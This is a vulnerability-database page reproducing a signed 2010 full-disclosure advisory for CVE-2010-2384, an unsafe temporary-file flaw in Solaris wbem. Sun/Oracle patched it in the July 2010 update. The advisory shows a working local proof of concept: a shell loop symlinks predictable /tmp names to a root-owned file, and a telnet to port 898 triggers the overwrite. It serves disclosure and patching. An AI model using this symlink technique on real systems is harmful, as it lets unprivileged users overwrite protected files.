Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFrank StuartPACKETSTORM:92000
HistoryJul 21, 2010 - 12:00 a.m.

Solaris wbem Unsafe Use Of Temporary Files

2010-07-2100:00:00
Frank Stuart
packetstormsecurity.com
23

0.0004 Low

EPSS

Percentile

0.4%

JSON
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Below is the full disclosure information for CVE-2010-2384. It was  
reported to [email protected] on 3 January, 2010 and assigned Sun  
bug 6913886.  
  
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical  
Patch Update  
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).  
  
- ------  
  
When the wbem service is enabled  
but hasn't been used before, it will run  
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited  
by an unprivileged local user like this:  
  
$ id  
uid=101(fstuart) gid=14(sysadmin)  
$ cd /tmp  
$ x=0  
$ while [ "$x" -ne 30000 ] ;do  
> ln -s /etc/important /tmp/dummy.$x  
> x=$(expr "$x" + 1)  
> done  
$ ls -dl /etc/important  
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important  
$ cat /etc/important  
This is an important file!  
  
EOF  
$ telnet localhost 898  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
  
  
  
^]  
telnet> quit  
Connection to localhost closed.  
$ cat /etc/important  
/<\/Scope>/ {  
n  
i\  
<Folder TreeDisplay="false"> \  
<Name>SUNWrmui Bootstrap Folder</Name> \  
<Description>This a temporary folder to workaround a bug. It  
should be deleted during install. But if you do see it in the toolbox  
editor, do NOT delete it.</Description> \  
<Icon>status_16.gif</Icon> \  
<LargeIcon>status_32.gif</LargeIcon> \  
</Folder>  
}  
  
SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be  
exploited.  
  
- ------  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y  
SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL  
KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY  
SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY  
a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD  
NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w==  
=8592  
-----END PGP SIGNATURE-----  
`

Related

securityvulns 3
prion 1
cve 1
oracle 1
securityvulns
securityvulns
CVE-2010-2384: Solaris wbem unsafe use of temporary files
2010-07-20 00:00:00
Oracle / Sun applications multiple security vulneraebilities
2010-07-20 00:00:00
Oracle Critical Patch Update Advisory - July 2010
2010-07-15 00:00:00
prion
prion
Design/Logic Flaw
2010-07-13 22:30:00
cve
cve
CVE-2010-2384
2010-07-13 22:30:00
oracle
oracle
Security | Oracle Critical Patch Update - July 2010
2010-07-13 00:00:00

0.0004 Low

EPSS

Percentile

0.4%

JSON
Related for PACKETSTORM:92000
securityvulns3prion1cve1oracle1